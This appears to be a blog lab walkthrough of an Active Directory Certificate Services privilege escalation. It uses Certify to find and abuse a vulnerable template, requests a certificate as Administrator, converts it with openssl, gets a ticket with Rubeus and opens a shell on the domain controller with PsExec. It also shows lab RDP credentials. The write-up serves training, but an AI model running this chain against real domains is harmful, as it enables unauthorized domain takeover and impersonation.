Post

IML - Kerberos: Ep.12 – Active Directory Certificate Services

Kerberos Ep.12 – Active Directory Certificate Services - A walkthrough of the challenge with enumeration, exploitation and privilege escalation steps.



IML - Kerberos: Ep.12 – Active Directory Certificate Services

image1

image2

  • RDP:
1
2
xfreerdp /v:10.102.155.250 /u:s.villanelle /p:Summ3r2021! /d:krbtown +clipboard +drives /drive:root,/home/kali /dynamic-resolution

image3

  • Find vulnerable templates:
1
2
.\Certify.exe find /vulnerable

image4

image5

Certify request /ca:<Name of the CA retrieved previously> /template:<Name of the vulnerable template> /altname:<User to impersonate>

1
2
.\Certify.exe request /ca:DC01.krbtown.local\krbtown-DC01-CA /template:VulnTemplate /altname:Administrator

image6

image7

image8

  • Copy RSA key and Cert and paste in to Kali (cert.pem):

  • Run (Leave passwords blank):

1
2
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

image9

image10

image11

  • Copy that file through the mounted drive to the Windows Desktop

  • Open Powershell:

1
2
.\Rubeus.exe asktgt /certificate:cert.pfx /user:Administrator /ptt

image12

image13

  • Now that you have a TGT for the administrator user, you can use PsExec to log in to the DC:
1
2
.\PsExec64.exe \\dc01.krbtown.local cmd

image14

image15

This post is licensed under CC BY 4.0 by the author.